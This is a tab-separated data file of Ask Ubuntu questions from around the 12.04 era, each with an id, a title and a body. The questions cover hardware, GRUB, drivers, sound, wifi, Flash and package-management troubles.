172706	vertical bars on screen	i have just bought lenovo z570 and installed ubuntu 11.10 on it . i normally work on the machine with a distance of almost 1.5 feet but i can see vertical bars all over the screen . i have shown my laptop to friends but they could n't notice the bars . i on the other hand can not un-see them even though the pixel bars are small . my resolution is set to 1366x768 . lshw returns following : *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : d0000000-d03fffff memory : c0000000-cfffffff ioport:3000 ( size=64 ) i was thinking if its a driver problem because i saw a similar machine on display running windows and i found its display just fine . that machine had however , following device : name : amd radeon ( tm ) hd 6620g chipset type : ati display adapter approx . total memory : 3046 mb display mode : 1366x768 ( 32-bit ) ( 60/hz ) i guess my display device is intel based . any idea if the problem can be solved or should i return my laptop ?
172708	deleted ubuntu , grub was accidentally deleted and windows recovery cd not working . help !	i deleted ubuntu as it stopped working and i could n't find a solution on the internet . i planned to deleted ubuntu for now and reinstall it when i find my installation cd . however , i did n't think about grub and then when i turn on the computer it said the grub partition can not be found so i could n't load into windows . my recovery cd for windows vista does n't have an option to recover/repair windows at all . so , seeing as there was nothing in the windows partition that i needed , i decided to do a full reinstall . after installing the computer said to restart it . once i restarted the computer i got the grub partition message once again . i need help .
172709	how to autostart conky in lubuntu ?	currently running lubuntu 12.04 on my lenovo s10-e . i have installed conky for the 3rd time , the first time i have nowhere , then removed it . the second time i have a basic conky to appear but it looked awful and flickered . now at last i have a nice conky that i downloaded from http : //www.noobslab.com/2012/06/install-conky-lua-in-ubuntulinux.html . my problem is that i ca n't get it to autostart . i have tried several answers i found while trawling through all of google 's usual linux haunts like scripts that will make it autostart by putting it in the autostart folder . i 'm a little bit in over my head here although the fact i have a working conky now is great . i also get an error message from my terminal when i start conky it reads : $ conky warning : gnome-keyring : : could n't connect to : /tmp/keyring-kmdtdl/pkcs11 : no such file or directory conky : /home/paul/.conkyrc : 22 : config file error conky : desktop window ( 140012f ) is subwindow of root window ( a8 ) conky : window type - normal conky : drawing to created window ( 0x2800001 ) conky : drawing to double buffer i do n't know whether the error message is important or not as i do n't really understand it .
172712	switching displays while keeping windows in workspaces	i currently have my laptop configured to use only the external display when i plug it in at my desk , and when i unplug the display , it uses the internal laptop display as i 'd expect . everything works great , but for some reason , windows move into different workspaces when i unplug or plug my external display in . i do n't mind windows changing sizes ( the external display is quite a bit larger than the internal one ) , but i do like having certain tasks stay in one workspace . every time i switch my display i have to go through all my windows and distribute them how i like . is there some way to keep them in the workspace they 're in when i switch ?
172714	i can not run windows-based games i download from a site called big fish games	the program ( a windows- based seek and find game ) , will download into firefox , but will not run . they have something called a game manager stub that is to install , but is not compatible , apparently . when i questioned their tech support , they stated that there is no way to run it with ubuntu . i find that hard to believe with as many programs as you have developed to allow ubuntu to be so easy to use . i am running 12.04 . i have installed wine . i hope someone may be able to help . thanks , joanne carroll
172716	how can i import my printer ( s ) into google cloud print ?	i have google cloud print , how do i import my ubuntu printer into it so i can print to it from other devices ?
172719	how to change adobe flash player cache location in home directory ?	default location is ~/.adobe/flash_player/assetcache but i would like to move it to ~/.cache
172722	problem with brightness settings with acer aspire one d255e in 12.04	i run ubuntu 12.04 on my netbook ( acer aspire one d255e ) and i have the following problem with the brightness settings : if i want to adjust the brightness with the fn-key , i can only change between three brightness steps , but my netbook has nine brightness steps . if i adjust the brightness in the system settings , it works fine and i can choose between nine steps , so i know they are there . they are just jumped , when i use the fn-keys . the funny thing : if i click the fn-key like crazy , i can get to the steps between , too . does anybody have an idea , what the problem might be ? thanks !
172725	gparted does not see my fujitsu hdd	i have a fujitsu hdd and it was working properly for more than a year . but know i am tring to use it with windows or ubuntu but none of them can recognize . i tried refreshing gparted to recognize it but it stays for a long time trying without any luck . any way to force 'mount ' or copy entire hdd to the internal hdd ?
172726	can i run balloons.io by gravityonmars ?	i wonder if i can run balloons.io an open source project on my ubuntu server ?
172727	how to make a vm use amd iommu so i can use a 2nd graphics card ?	this is related to my question here , however i did n't get the answer of how to implement it in a vm only of what it was . having read that i have a 2nd graphics card that i do n't use , how ( if possible ) can i make a vm that could make use of that card through the iommu feature in my motherboard chipset . the chipset is an amd 990x , the 2nd card is an nvidia 8600gt and the motherboard is an asus m5a99xevo ( the first one , as there 's a r2.0 ) .
172734	how can i adjust the bass and treble ?	i can not seem to find any option for this . is this something that is only supported by the driver ?
172735	how can i create a usb raid ?	reading this link , it describes how to make a raid array out of usb sticks , however it describes the process using gentoo now i do n't know about gentoo and have never used it , but i 'm supposing this is possible in ubuntu if so how ? .
172744	web-apps preview always goes to same hulu page	every time i access hulu from the dash using web-apps it takes me to the same ( previously viewed ) video instead of the main sign-on screen for hulu . i just tried it with youtube and it does the same thing . and with launchpad it takes me here https : //login.launchpad.net/9twfj6f1ttzsjwlb/+decide - where it says `` invalid openid transaction '' . how do i correct this ?
172750	how to add partition for ubuntu 12.04 in my macbook pro 7.1 that already have windows xp and os x 10.6.8 ( bootcamp ) ?	i have windows xp and osx 10.6.8 in my mac via bootcamp . now that i want to install ubuntu , i want to add 2 extra partitions ( for linux and linux swap ) . previously only macintosh hd and bootcamp for windows xp . however , the partition ca n't be made . the message says that the verification failed . can anyone help me to partition my hard drive ? fyi : i am using diskutility .
172751	no password prompts in ubuntu ( except login and lock screen )	i would only like a password prompt at login and lock screen ( i.e , to make sure others do n't use my computer ) . however , when i am at my computer , i do not want to be prompted at all for my password , for any reason . i realize it is a `` security risk '' , but i am a developer and the loss of convenience is more important to me . adding `` nopasswd '' to sudoers will stop it from prompting at the shell , but stuff like update manager and ubuntu software center will still bother me . any help is appreciated . thanks !
172759	change `` get help '' and `` translate this app '' quickly	if have created an app with quickly with the name `` vault '' ... but in launchpad the name was already taken for a branch i used `` vault-encfs '' because its a gui for encfs ... now i have a problem with the option `` get help '' and `` translate this app '' in the help menu which tries to find vault in launchpad and not vault-encfs ... can i change it ? traceback ( most recent call last ) : file `` < string > '' , line 5 , in < module > file `` /usr/share/launchpad-integration/launchpadintegration/main.py '' , line 48 , in main pkginfo = packageinfo.frompackagename ( options.package , logger ) file `` /usr/share/launchpad-integration/launchpadintegration/packageinfo.py '' , line 219 , in frompackagename ' '' % s '' ' % package ) launchpadintegration.packageinfo.packagenotfounderror : could not look up package info for `` vault ''
172760	radio tray unity panel icon color change	thanks to the linux action show i 've discovered the awesome radio tray panel applet and am loving it . the only problem i have with it is that the icon is blue and everything else in my system tray is white . how would i go about changing the icon color ? thanks in advance from a new ubuntu fan !
172766	how do i restrict ports to certain users ?	alright , well , what i wanted to do was to allow my users to only be allowed to access a specific port , in example , usera can only access port 2004 while userb can only access ports 2009 , and 2010 to be more helpful , i 'll try and explain . basically , users will be allowed to remotely access the server , and call a program through ssh . the thing is , the program allows the user to type in the port to use . is there any way to restrict users to only be able to use certain ports ... i 'm assuming i may have to some how modify the program so that a user can only access certain ports ( and in turn some how assign the ports to each user ) , but i 'm unaware of how this would be done .
172767	security measures regarding specifically online shopping and banking	i 've read the community wiki and some questions made here in askubuntu about security measures on ubuntu , but i would like to focus and narrow this topic to the security of online money transactions , because it is what concerns me the most and probably any other conscious user too , one that always tries to remain safe on regular daily tasks online , has his private documents encrypted and keeps regular backups of the system and as a result , getting his bank account invaded or having his identity stolen may be much more of a concern than a system corruption . is a vpn service with ssl connection enough to make this kind of operation as secure as possible ( even if using public wireless spots ? ) i am counting on using a live-usb with firefox or chrome browser , both the live system and the browser used only and strictly for this delicate purpose , thus creating an independent system to take precaution against any potential malware that may be already infiltred on my regular everyday system and browser and also i 'll be using a secure connection . any other security measures that i should be aware of ?
172770	malformed line in the source list /etc/apt/sources.list ( dist parse ) , dont let me use update manager	here is the error hope i can get some help , i show you the update manager and the line of the error , if you need something else just ask for it . update manager error prompt : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : malformed line 58 in source list /etc/apt/sources.list ( dist parse ) , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened . ' ================================================================================ error line : deb http : mx.archive.ubuntu.com/ubuntu/ precise-updates main restricted
172772	chkdsk /r problems	i got the below error message every time i try to boot up in linux . i have done all the wubi stuff properly . i ran chkdsk /r as the administrator in command prompt and restarted my computer . it went through an almost 3 hour process of checking the disk , then it restarted and i booted into windows like it told me too , when i restarted and booted to ubuntu and i got the same error message . it is really frustrating because i have been trying to install ubuntu for almost 2 days now . thanks guys
172774	wireless unstable with an atheros ar9285	i have a asus eee pc 1001px running ubuntu 12.04 . everything works well but the wifi is unstable . when i boot the wifi works fine , but after about 5-10 min it gets slow , disconnects etc and the computer starts to run slowly . the it is ok after reboot , for about 5-10 min . any ideas ? i have tried everything i have found with google but nothing works . i have tried a few different wifi routers and it is always the same . sudo lshw -class network *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 48:5d:60:7d : b8:66 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-27-generic-pae firmware=n/a ip=192.168.1.82 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : fbff0000-fbffffff *-network description : ethernet interface product : ar8132 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : c0 serial : bc : ae : c5:27:61:81 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:46 memory : f7fc0000-f7ffffff ioport : ec00 ( size=128 ) thanks .
172775	i have tearing on lubuntu 12.04 32bit ( on flash videos things are very bad ) , on ubuntu 12.04 i dont have tearing	i have tearing on lubuntu 12.04 32-bit ( on flash videos things are very bad ) . on ubuntu 12.04 i do n't have tearing . when i use compiz there is no tearing but my machine is low-end and has a slow processor and graphics card so i dont want compiz . i want to find a solution to stop tearing without enabling compiz . my graphics card is nvidia 9400 ( m ) . how can i fix this ?
172780	12.04 gnome classic launcher icons on gnome panel , size and spacing	i 've been searching the forums and google for a while and nothing seems to work . i have a top and bottom panel in ubuntu 12.04 gnome classic using the default ambiance theme . my top panel has all my most used apps on but they are all the same size as the panel and touching each other . i 'd like to reduce them and space them out a bit . anyone managed this and know how to do it ? thanks .
172781	why does sites not recognise flash ?	i have the mozilla flash plugin installed from the software centre , but some sites still does not recognize that i have flash . one such site is livemocha.com . if you try and play a video , it will notify you that the flash player is required , but i have it installed .
172782	how to donate to the ubuntu project , without using paypal ?	also , the address must be in the usa . thank you very much.fb update : i 'm sorry , your right . i need the address for ubuntu . i would like to donate by sending a check or pay with a credit card but , all i can find is how to use paypal and i refuse to use paypal . so , if there is an address for a check or where i can donate with a credit card i would appreciate that information . thanks again .
172783	adobe will stop releasing new versions of flash - what will happen to flash support in ubuntu ?	adobe 's flash download page is displaying a message : note : adobe flash player 11.2 will be the last version to target linux as a supported platform . adobe will continue to provide security backports to flash player 11.2 for linux . what is the plans for flash support in the future ? with a bit of luck html5 media support will drop website developer 's dependency on flash .
172784	has anyone used the lenovo y480 with ubuntu ?	i 'm looking into a laptop with good graphics capabilities for under $ 1000 , and i came across the lenovo y470p and y480 . the y470p has an amd graphics card which i 'm told is supported better under linux but is otherwise `` last gen , '' while the y480 has a nvidia 640m card but is much newer tech . i 'd like to know what the state of nvidia drivers are in ubuntu and if this is an unsupported optimus card or if it would be a good computer to use . if possible i would like to use linux for everything , and the graphics would be a nice bonus but i am willing to keep windows on the computer for the occasional game .
172787	how do i change the permision on a external hdd	good day , i am a ubuntu newbie and i am having trouble using an external 3.5 '' hdd . i did some reading about file systems and decided to format my new drive to ex3 . after formatting , i could not read or write because i did not have permission . i have tried pysdm and tried chown but it is still not working . please could someone provide me with a simple step-by-step `` how to '' on this ? thank you , andrew
172791	setting up the gdm theme	i 'm using ubuntu 12.04 with gnome classic ( no effects ) and because of the fact that some system options have disappeared with the new system release i 've been struggling with this for a while and despite this seems very easy i ca n't do this : / - does anyone know how to choose a gdm theme ? i 'm quite sure that gdm is now in use on my ubuntu - i set it up with : sudo dpkg-reconfigure gdm despite i moved the theme folder to /usr/share/gdm/themes nothing has changed by now , i 've logged out and in a couple of times but everytime i get the standard log in window and wallpaper ( different from mine ) . so i 'll appreciate any kind of help from anybody , now i have absolutely no idea how to figure it out . cheers .
172797	how to copy an ubuntu iso file to cd-r in windows 8 ?	i need to copy the iso file for ubuntu 12.04 to a cd-r in win8 . how do i do so ?
172798	how can i copy folder 's contents and tree-structure into a remote directory with same structure	is it possible in ssh terminal to copy a folder directory into another directory that will share mostly the same folder names/structure but will have unique files . in a simple example : if folder1 has app > code > com > file 1 and folder2 has app > code > com > file 2 theme > bah > file 3 is it possible to copy app across 'app ' to 'app ' so that the files will populate the existing folders and new folders that are n't present will be created in the same structure . basically i 'm trying to install a module that i would normally do through ftp but i only have ssh access to this new server . using scp results in ./app : directory not empty
172806	nvidia powermizer performance levels	is there anyway to configure nvidia powerimizer performance levels ? my current setup has 3 power levels with the lowest one being 50mhz . the problem with this it that it lags compiz when it goes to the lowest performance level 0 . minimizing , maximizing , dragging windows , etc . are all sluggish when it 's at the lowest level . once powermizer leaves level 0 everything is very smooth and runs great . is there anyway for me to remove level 0 and just run level the two higher levels 1/2 ? i do n't want to complete disable powermizer , but i ca n't stand the lagging once powermizer goes into performance level 0 . setting the option `` prefer maximum performance '' fixes the problem as it disables powermizer , but the gpu is overkill at stock speeds for most desktop use @ 850mhz . intel i5 2500k asus gene-z z68 evga 560ti fpb ( driver 295.40 ) ubuntu 12.04 lts x64
172808	ubuntu 12.04 install - black screen - no grub - have run boot repair disk	day 4 of my purgatory . history : had problems with live cd at first , had to set the `` nomodeset '' option ... and then it worked fine . installed ubuntu `` alongside '' windows xp from live cd ( not wubi ) upon reboot after installation , i get the bios ... and then a black screen . if i hit shift after the bios screen i get text that says `` loading grub .. '' , but then no grub ... just a black screen . what i have tried to do : total re-installation ... 3 times now . also tried with wubi , same black screen . have gone back to the normal ( non-wubi ) install . after installation , i tried re-booting the live cd ... and trying to change grub file using : sudo gedit /etc/default/grub ... to `` nomodeset '' and `` timeout=10 '' ... but wo n't let me save my changes because i 'm using the live cd `` in memory '' system and do n't have permissions to the disks ( i think ) . i tried logging in ... but it wo n't let me . i then read many posts on this site . i 'm stuck . this morning , i ran the `` boot repair disk '' . results here : http : //paste.ubuntu.com/1132333/ what i think is wrong : since i can get the live cd to run ( perfectly ) with the `` nomodeset '' option , i think all i need to do is get to grub to change that ... but i ca n't get to grub . appreciate any advice . pat day 5 ... i downloaded `` super grub 2 disk '' from : http : //www.supergrubdisk.org/super-grub2-disk/ this looks promising . i can boot the disk and it brings me to a grub program that allows me to : 1 ) boot to windows ... which works 2 ) boot to ubuntu ... which does not work when i choose boot to ubuntu , i get lines across the screen which is an obvious video card problem . likely because i need to set the `` nomodeset '' option . so , i attempted to use super grub2 to edit the grub file ... but it is totally different than the ubuntu grub file ... and i do n't know where to put the `` nomodeset '' option . still stuck ... the bottom line is that : 1 ) i need to edit /etc/default/grub on sda ( 1 ) ... which is my boot drive ... to add the `` nomodeset '' option 2 ) to do that i need to get into grub ... but , i ca n't . holding down shift just echo 's `` loading grub .. '' and then takes me to a black screen 3 ) i can boot to the live cd by setting nomodeset ... . but i can not access the hard disk as root ... i ca n't save my changes ! can anyone tell me how to login as root for the filesystem from the live cd ... so i can edit the grub file on the hard disk ... and then run update-grub ? ?
172810	12.04 call trace - system crash ?	last night my screen suddenly turned black ( black screen like when my laptop is turned off ) while i was extracting a rar file , and i was unable to restart my laptop after . assuming it was a dead screen , i hooked my laptop to a another laptop as a spare monitor to test it but the spare screen turned black too . this morning , i tried to turn my laptop on and it loaded properly until i was asked to type in my password for my account and then this error appeared . does this mean that my os crashed ? this is the second time for 12.04 to crash on my laptop . first was the 32-bit , and now 64-bit . would it be better to switch to an earlier distro like 11.10 64-bit ? i 'm tired to reformatting my laptop and losing files . i am using thinkpad r61i 12.04 64-bit 160gb hard drive 3.8gb ram . eta : roughly 6 hours after being unable to turn on my laptop , i tried to boot it again and it loaded properly to my desktop . i 'm worried that this might occur again not knowing the reason for it .
172813	how to recover backgrond process from a killed terminal	i have launched a long running process from ssh in background . unfortunatly my connexion crashed . now i 'm trying to recover this process but when i execute fg it did n't detect it . how can i bring it back to foreground ? thanks .
172814	how do i install komodo edit ?	new to linux , help me install this program komodo-edit-7.1.0-10496-linux-x86_64 i 'm running ubuntu 12.04 64bit .
172818	is xubuntu really faster than ubuntu ?	i installed xubuntu desktop on top of ubuntu 12.04 . the usage of ram and cpu is in general lower than in ubuntu . but when it comes to some serious computations i did not see much of a difference between the two . for example , i ran a matlab program that took 99 seconds to run on ubuntu and 98 seconds on xubuntu . then i ran geekbench benchmarking and the overall scores ubuntu and xubuntu are 2996 and 2997 , respectively . my laptop is a 4 year old dell 1535 . would things run faster on a clean install of xubuntu ?
172820	sound troubles with 12.04 on dell latitude d420	when upgrading from 10.04 to 12.04 sound playback with internal speakers stopped working on my dell latitude d420 laptop . before the upgrade i 'd had intermittent problems with sound , mostly with recording , but recording seems to be working now . if i run mplayer /usr/share/sounds/alsa/front_center.wav i get no sound . if i run aplay /usr/share/sounds/alsa/front_center.wav i get no sound . if i run aplay -l i get two sound devices : **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : stac92xx digital [ stac92xx digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 in audacity i have twelve sound output choices : hda intel stac92xx analog ( hw0:0 ) - works hda intel stac92xx digital ( hw0:1 ) - no sound sysdefault - works front - works surround40 - works surround51 - works surround71 - works iec958 - no sound spdif - no sound pulse - no sound dmix - works default - no sound if i run `` aplay -l '' to list pcms i get : default playback/recording through the pulseaudio sound server sysdefault : card=intel hda intel , stac92xx analog default audio device ... iec958 : card=intel , dev=0 hda intel , stac92xx digital iec958 ( s/pdif ) digital audio output dmix : card=intel , dev=0 hda intel , stac92xx analog direct sample mixing device dmix : card=intel , dev=1 hda intel , stac92xx digital direct sample mixing device dsnoop : card=intel , dev=0 hda intel , stac92xx analog direct sample snooping device dsnoop : card=intel , dev=1 hda intel , stac92xx digital direct sample snooping device hw : card=intel , dev=0 hda intel , stac92xx analog direct hardware device without any conversions hw : card=intel , dev=1 hda intel , stac92xx digital direct hardware device without any conversions plughw : card=intel , dev=0 hda intel , stac92xx analog hardware device with all software conversions plughw : card=intel , dev=1 hda intel , stac92xx digital hardware device with all software conversions if i run aplay /usr/share/sounds/alsa/front_center.wav -d default i get no sound . if i run aplay /usr/share/sounds/alsa/front_center.wav -d hw i get no sound and an error message : aplay : set_params:1087 : channels count non available . if i run aplay /usr/share/sounds/alsa/front_center.wav -d plughw it works and i hear `` front center '' . -d sysdefault also works . when i turn the computer on it makes the startup chime properly . when i open the `` sound '' program on the `` output '' tab it has one option for `` play sound through '' : `` digital output ( s/pdif ) built-in audio '' . when i plug in headphones another option appears there : `` headphones built-in audio '' . selecting that option works and gives me sound in all programs , though if i run the aplay -d sysdefault command i now get : alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave aplay : main:682 : audio open error : device or resource busy
172821	what movie catalog software is available ?	i 'm currently using ant movie catalog in windows , is there any similar apps in linux ( preferably open source ) ? i 'm trying to move away from xp and trying migrate my apps from xp to linux/ubuntu . i understand that you could install under wine , the trouble is i 'm still learning and never used wine before , so if it 's possible , i 'd like to avoid using it at this moment .
172827	ca n't even load grub on new installation of 12.04	i recently installed 12.04 . i had some trouble with that but it seemed to work okay when i got past the errors . after reboot , the bios loaded but nothing else . the screen turns black then the monitor turns off . i tried holding shift but grub did n't load . i also tried running the boot repair disk but that did n't work either . it loaded a bunch of text but then it stopped loading . it would still input my keystrokes and the screen was not frozen but nothing happened . it looked like errors in the final text it output . any ideas for what might be causing this ? i have installed ubuntu server 11.10 successfully on the same computer before .
172828	typing ' twice turns it into â´	i am having a very minor problem . when i press ' ( single quote ) twice , it turns into a â´ ( like that thing under ~ but reversed ; i don even know the name which is probably why i have n't found a solution ) . is there a way to get simply '' when pressing ' twice ? thanks in advance ! i tried keyboard set to english ( us international ) and english ( uk )
172829	my /home is unlocated after boot repair	ok here the thing ... i wanted a windows7 install beside my existing ubuntu 12.04lts . so i googled some and used many wikis to figure it out . i made some free space for my windows installation on my hdd . after this was done i installed windows on this free space . after the installation was done i booted my boot repair usb live dongle to fix the grub . everything runs fine . both systems are in grub , windows runs and ubuntu starts ... till it cant find my /home partition . i rebooted and started repair boot usb dongle to check the partitions with gparted ... the /home is unallocated . do n't know what to do next , do n't want to lose this /home content . guess its just something with the partition table , i hope it is . seems that sda3 moved to a new partition . sdb is the usb dongle . any ideas or suggestions for me ? fdisk -lu user @ debian : ~ $ sudo fdisk -lu disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1ebcccc9 device boot start end blocks id system /dev/sda1 2048 39063551 19530752 83 linux /dev/sda2 39065598 437198847 199066625 5 extended /dev/sda3 * 437198848 437403647 102400 7 hpfs/ntfs /dev/sda4 437403648 488394751 25495552 7 hpfs/ntfs /dev/sda5 425340928 437196799 5927936 82 linux swap / solaris disk /dev/sdb : 2021 mb , 2021654528 bytes 63 heads , 62 sectors/track , 1010 cylinders , total 3948544 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 62 3945059 1972499 c w95 fat32 ( lba )
172833	trying to update 12.04 lts	i am trying to update 12.04lts on my laptop and for the past couple of days i have been getting this error message : w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/fullcircle-issue-59/ubuntu/dists/precise/main/binary-i386/packages the requested url returned error : 401 , e : some index files failed to download . they have been ignored , or old ones used instead . any ideas ?
172840	does ubuntu one sync files located inside a relocated home folder ?	it is my understanding that ubuntu one does not sync files or folders that are not located within the ubuntu file structure , that is , i can not sync files on an additional hard disk ( please correct me if i '' m wrong ) , but i am wondering , if i were to reinstall ubuntu and relocate ( or mount ) my home folder to another partition ( for argument sake , the partition is on another hard disk ) would ubuntu one file sync work ?
172844	how to prevent another user from editing my display name in empathy ?	how can i prevent another user from editing my empathy display name ? since i am using shared computer , is there any solution ? i have administrative privileges .
172845	i ca n't shut down , how can i fix this ?	i 've tried some solutions on here which did not work , there are no errors shown when i press the esc key whilst shutting down , and the animation gets stuck on the first dot if it do n't press esc . how do i fix this ?
172847	12.04 error : apt-get fails	most of my apt-get fails , and i am suggested by ubuntu to run 'sudo apt-get -f install ' which gives this : dpkg : error processing ubuntu-standard ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of grub-pc : grub-pc depends on grub2-common ( = 1.99-21ubuntu3 ) ; however : version of grub2-common on system is 1.99-21ubuntu3.1 . grub-pc depends on grub-pc-bin ( = 1.99-21ubuntu3 ) ; however : version of grub-pc-bin on system is 1.99-21ubuntu3.1 . dpkg : error processing grub-pc ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-24-generic ; however : package linux-image-3.2.0-24-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.24.26 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-3.0.0-19-generic linux-image-3.2.0-24-generic friendly-recovery memtest86+ ubuntu-standard grub-pc linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what i do now .
172855	remote ubuntu install	how would i go about installing ubuntu server on a remote dedicated server ? i am not sure whether it has pre-existing os on it or not . thanks !
172859	xubuntu start up screen ... but i 'm running normal ubuntu	i was interested in playing around with xfce . i made a livecd and played around with it a bit and really liked it . i thought that instead of installing xubuntu itself i would just install the metapackages on my already existing ubuntu . so , i tried it out by installing xfce4 and then later xubuntu-desktop on my ubuntu 12.04 . neither had the exact same style as the livecd which i preferred , so i decided to delete xfce from my computer and install a partition instead . through synaptic i removed xfce4 ( and completely removed xfce-notifyd so that my notifications would work with the unity style again ) . i later went on to remove most of the packages and their dependencies that came with xubuntu-desktop , and i think that removed a lot of it . while my desktop now works perfectly , it has changed two things . for one , the xubuntu welcome screen comes out instead of the ubuntu one ( though i have to say the xubuntu screen looks a lot nicer ) . i 'd still rather it say ubuntu . secondly , i had tweaked grub with grub-customizer to have an image i found of ubuntu that was really cool . now when grub starts up , it has a picture of debian ( i think that 's random but maybe it comes with xubuntu ? ) . i can probably just change the second one but still i 'm just curious . can anyone help me get the old ubuntu screen back ?
172861	ubuntu 12.04 logins to tty1 instead of regular login screen , ca n't start lightdm .	i just tried installing my nvidia graphics card , and when i try to start lightdm it just sits there at : saned disabled ; edit /ect/default/saned so , i tried to reboot but it keeps going into tty1 instead of regular login .
172862	autostart application in new workspace in gnome-shell	i 'd like to autostart firefox and thunderbird on e.g . 2 and 3-rd workspaces when login . if i add them to autostart in gnome-shell they both open on the first workspace . is there a way to autostart application on the certain workspace , or at least on the `` next '' workspace ( similar to dash middle-click ) . i 'd like to avoid using auto-move-windows extension .
172865	ubuntu installation inside/outside windows - which is better ?	i am aware that ubuntu can be installed on a machine in two ways keeping windows os in parallel , probably the installation is called inside windows and outside windows ? ( please correct me if i am wrong ) my question is which approach is better and why ? will there be any difference in the behavior of processes or any other change at system level ? what are the advantages/disadvantages of one approach over the other ? -thanks
172866	installing 12.04 to dual boot : partitions not labeled	i am installing 12.04 from a cd on a computer with an existing windows xp installation , which i would like to keep in case my mom ca n't handle ubuntu . the problem is this : when selecting `` install ubuntu alongside them '' , the next screen gives me a choice of selecting a drive ( there is only one ) , and `` allocate drive space by dragging the divider below : '' , with two unlabeled partitions . their sizes are shown , but their content is a mystery . between the two sub-partitions ( 49.3 + 32.0 gb ) , it 's just about the entire hard drive ( 82.3 ) . my question is this : is ubuntu about to erase the windows installation ? do i have to use the advanced partitioning tool ? i would love to assume that one of these partitions will be given to windows xp and the other to ubuntu , but as they are not labeled , i am at a loss .
172867	how to get étoilé on ubuntu	étoilé is a desktop environment . i want on on my ubuntu 12.04 computer but how ? can you please help me with it .
172870	error building kernel for core i7	i 'm trying to build the kernel for intel core i7 following the steps from http : //duopetalflower.blogspot.ro/2011/10/custom-64-bit-ubuntu-kernel-31.html ( similar duopetalflower.blogspot.com.es/2010/10/ubuntu-maverick-64bit-kernel.html and www.n00bsonubuntu.net/content/how-to-build-linux-kernel-3-2-0-7-13-for-i7-systems-on-ubuntu-11-10/ ) on a linuxmint 13 ( maya ) 64-bit machine . i tried 3 different versions 3.4.7 , 3.5 and 3.6-rc1 , always applying the associated ubuntu patches but i always got the same error . the error occurs when trying to build the common header and source debs using skipabi=true skipmodule=true fakeroot debian/rules binary-indep . the error is caused by the missing of makefile for hv_kvp_daemon.c ( an implementation of key value pair ( kvp ) functionality for linux ) from folder linux/tools/hv how this issue can be solved ? link perf gen perf-archive gen python/perf.so make [ 1 ] : leaving directory `/home/anv/kernel/3.5/linux-3.5/debian/build/tools-perarch/tools/perf' if [ `` amd64 '' = `` amd64 '' ] || [ `` amd64 '' = `` i386 '' ] ; then \ cd /home/anv/kernel/3.5/linux-3.5/debian/build/tools-perarch/tools/power/x86/x86_energy_perf_policy & & make cross_compile= ; \ cd /home/anv/kernel/3.5/linux-3.5/debian/build/tools-perarch/tools/power/x86/turbostat & & make cross_compile= ; \ cd /home/anv/kernel/3.5/linux-3.5/debian/build/tools-perarch/tools/hv & & make cross_compile= cflags=-i../../include ; \ fi make [ 1 ] : entering directory `/home/anv/kernel/3.5/linux-3.5/debian/build/tools-perarch/tools/power/x86/x86_energy_perf_policy' cc x86_energy_perf_policy.c -o x86_energy_perf_policy make [ 1 ] : leaving directory `/home/anv/kernel/3.5/linux-3.5/debian/build/tools-perarch/tools/power/x86/x86_energy_perf_policy' make [ 1 ] : entering directory `/home/anv/kernel/3.5/linux-3.5/debian/build/tools-perarch/tools/power/x86/turbostat' cc turbostat.c -o turbostat make [ 1 ] : leaving directory `/home/anv/kernel/3.5/linux-3.5/debian/build/tools-perarch/tools/power/x86/turbostat' make [ 1 ] : entering directory `/home/anv/kernel/3.5/linux-3.5/debian/build/tools-perarch/tools/hv' make [ 1 ] : *** no targets specified and no makefile found . stop . make [ 1 ] : leaving directory `/home/anv/kernel/3.5/linux-3.5/debian/build/tools-perarch/tools/hv' make : *** [ /home/anv/kernel/3.5/linux-3.5/debian/stamps/stamp-build-perarch ] error 2
